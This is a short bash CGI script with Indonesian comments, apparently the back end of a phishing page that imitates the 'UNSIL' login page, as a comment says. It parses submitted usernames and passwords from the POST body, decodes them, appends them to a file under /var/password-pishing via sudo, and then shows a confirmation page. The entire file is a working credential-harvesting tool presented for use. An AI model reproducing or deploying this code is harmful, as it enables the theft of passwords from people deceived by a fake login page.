#!/usr/bin/env bash
# v0.3

echo "Content-Type: text/html"
echo ""

# Nama folder penyimpanan
FOLDER_PASS="/var/password-pishing"

# Buat folder jika belum ada
mkdir -p "$FOLDER_PASS"

# Lokasi file penyimpanan
FILE_SAVE="$FOLDER_PASS/user-password.txt"

# Ambil seluruh body POST
DATA=$(cat)

# ---- Ambil username ----
USERNAME=$(echo "$DATA" | sed -n 's/.*username=\([^&]*\).*/\1/p')
USERNAME=${USERNAME//+/ }
USERNAME=$(printf '%b' "${USERNAME//%/\\x}")

# ---- Ambil password ----
PASSWORD=$(echo "$DATA" | sed -n 's/.*password=\([^&]*\).*/\1/p')
PASSWORD=${PASSWORD//+/ }
PASSWORD=$(printf '%b' "${PASSWORD//%/\\x}")

# ---- Format penyimpanan ----
GABUNG="USER=$USERNAME PASS=$PASSWORD"

# Simpan ke file dengan aman (tanpa masalah sudo)
echo "$GABUNG" | sudo tee -a "$FILE_SAVE" > /dev/null

# Delay sebelum menampilkan halaman
sleep 2.5

# OUTPUT HTML PERSIS SEPERTI HALAMAN UNSIL

cat <<EOF
<!DOCTYPE html>
<html>
<head><meta charset="UTF-8"><title>Data Tersimpan</title></head>
<body>
<h2>Data telah disimpan.</h2>
<p>Username: $USERNAME</p>
<p>Password: $PASSWORD</p>
</body>
</html>
EOF
